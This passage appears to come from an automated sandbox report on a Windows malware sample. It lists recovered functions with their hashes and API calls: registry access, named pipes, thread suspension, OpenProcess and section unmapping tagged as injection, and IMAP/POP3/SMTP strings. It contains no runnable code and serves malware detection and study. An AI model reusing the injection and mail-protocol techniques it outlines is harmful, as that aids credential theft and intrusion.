  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7341, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 76 Total matches: 75stringfilememory
Similarity
  • Total matches: 75
  • API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen
  • String ID: Local\
  • API String ID: 100657750-422136742
  • Opcode ID: f69422c415cb778fefbc06e8825fe91035b8cc03ac1a89af78bf0cef88205365
  • Instruction ID: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
  • Opcode Fuzzy Hash: 99F02E34B1854287E12374A1016077FDA04E7F20C4D8C7767ED453950A6F0278F7661B
  • Instruction Fuzzy Hash: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
APIs
  • GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
  • CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
    • Part of subcall function 001D937A: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,001EB068,00000000), ref: 001D93B0
    • Part of subcall function 001D937A: lstrcpy.KERNEL32(00000000,00000000), ref: 001D93D4
    • Part of subcall function 001D937A: lstrcat.KERNEL32(00000000,00000000), ref: 001D93DC
  • GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
  • CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
  • lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
  • lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
  • HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
  • CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C178D, Relevance: 18.1, APIs: 12, Instructions: 117 Total matches: 53registrythreadsleep
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1A08, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122 Total matches: 58memorythreadstring
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB47B, Relevance: 16.7, APIs: 11, Instructions: 187 Total matches: 59synchronizationstring
Similarity
  • Total matches: 59
  • API ID: GetLastError$WaitForSingleObject$ReleaseMutexlstrcpynmemcpymemset
  • String ID:
  • API String ID: 1576942631-0
  • Opcode ID: bbb80d9d18486b754104cd36c0130e3b39926c5d582aef500eb7a1e8a66222a2
  • Instruction ID: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
  • Opcode Fuzzy Hash: 4A217F33157A22D745163840C0507BEF482FB825E694CB711FE21722DE4A8197F6AFDD
  • Instruction Fuzzy Hash: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
APIs
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB4AE
  • memcpy.NTDLL(?,?,00000010), ref: 001DB4D1
  • memset.NTDLL ref: 001DB51D
  • lstrcpyn.KERNEL32(?,?,00000034), ref: 001DB531
  • GetLastError.KERNEL32 ref: 001DB55F
  • GetLastError.KERNEL32 ref: 001DB5A2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB5C1
  • WaitForSingleObject.KERNEL32(?,000927C0), ref: 001DB5FB
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001DB609
    • Part of subcall function 001DB350: memset.NTDLL ref: 001DB398
    • Part of subcall function 001DB350: QueueUserWorkItem.KERNEL32(001DAFC4,?,00000010), ref: 001DB439
    • Part of subcall function 001DB350: GetLastError.KERNEL32 ref: 001DB443
  • GetLastError.KERNEL32 ref: 001DB67E
  • ReleaseMutex.KERNEL32(?), ref: 001DB690
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1586, Relevance: 16.6, APIs: 11, Instructions: 78 Total matches: 43memoryfile
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C20A7, Relevance: 15.2, APIs: 10, Instructions: 171 Total matches: 60memorystringthread
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBB92, Relevance: 15.1, APIs: 10, Instructions: 109 Total matches: 83pipesynchronization
Similarity
  • Total matches: 83
  • API ID: CloseHandleGetLastError$ConnectNamedPipeCreateEventDisconnectNamedPipeFlushFileBuffersWaitForMultipleObjectsWaitForSingleObject
  • String ID:
  • API String ID: 4178450735-0
  • Opcode ID: fea2056c6ced76e25bc66d29ae2c0ef00b9ab400e991bc076a25110f2a978033
  • Instruction ID: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
  • Opcode Fuzzy Hash: 34F07B324973A09BC12724748146BBA7A46FF612E7D8C7302ECB0B518E1F05A6F65369
  • Instruction Fuzzy Hash: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
APIs
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001CBBD2
  • ConnectNamedPipe.KERNEL32(?,?), ref: 001CBC02
  • GetLastError.KERNEL32 ref: 001CBC0C
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CBC30
    • Part of subcall function 001CB978: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
    • Part of subcall function 001CB978: WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
    • Part of subcall function 001CB978: ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CB9DD
    • Part of subcall function 001CB978: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
    • Part of subcall function 001CB978: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
    • Part of subcall function 001CB978: CancelIo.KERNEL32(?), ref: 001CBA27
    • Part of subcall function 001CB978: CloseHandle.KERNEL32(?), ref: 001CBA37
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CBA3F
  • CloseHandle.KERNEL32(?), ref: 001CBC9E
    • Part of subcall function 001CBB13: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CBB31
    • Part of subcall function 001CBB13: HeapFree.KERNEL32(00000000,00000000), ref: 001CBB84
  • FlushFileBuffers.KERNEL32(?), ref: 001CBC73
  • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 001CBC7C
  • WaitForSingleObject.KERNEL32(001EB094,00000000), ref: 001CBC89
  • GetLastError.KERNEL32 ref: 001CBCAB
  • CloseHandle.KERNEL32(?), ref: 001CBCB8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB838, Relevance: 15.1, APIs: 10, Instructions: 64 Total matches: 62sleepsynchronization
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF75B, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 172 Total matches: 23string
Similarity
  • Total matches: 23
  • API ID: LocalFreelstrcatlstrcpymemcpy
  • String ID: IMAP$P$POP3$SMTP
  • API String ID: 2001391702-3667654339
  • Opcode ID: 43434d26df3a4f5d7c34ecf30ecc38ca90c9099c92fdaea40e4787011e532f06
  • Instruction ID: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
  • Opcode Fuzzy Hash: 3911AF310449E3F79AAB229950026AB81429F117E2E5C9B21ED7C785CF6F03B14B770D
  • Instruction Fuzzy Hash: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
APIs
  • lstrcpyW.KERNEL32(00000000,001ED5A0), ref: 001DF84B
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001DF853
  • memcpy.NTDLL(00000000,?,00000000,-00000002), ref: 001DF8F1
  • LocalFree.KERNEL32(?,-00000002), ref: 001DF908
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001D93F1: lstrlenW.KERNEL32(00000000,00000000,001EAC44), ref: 001D9401
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DAFC4, Relevance: 13.8, APIs: 9, Instructions: 278 Total matches: 59memorythread
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAC3A, Relevance: 13.6, APIs: 9, Instructions: 124 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB593, Relevance: 13.6, APIs: 9, Instructions: 115 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C164D, Relevance: 13.6, APIs: 9, Instructions: 89 Total matches: 49memoryregistrystring
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB978, Relevance: 13.6, APIs: 9, Instructions: 82 Total matches: 110file
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC371, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109 Total matches: 97threadsynchronizationinjection
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
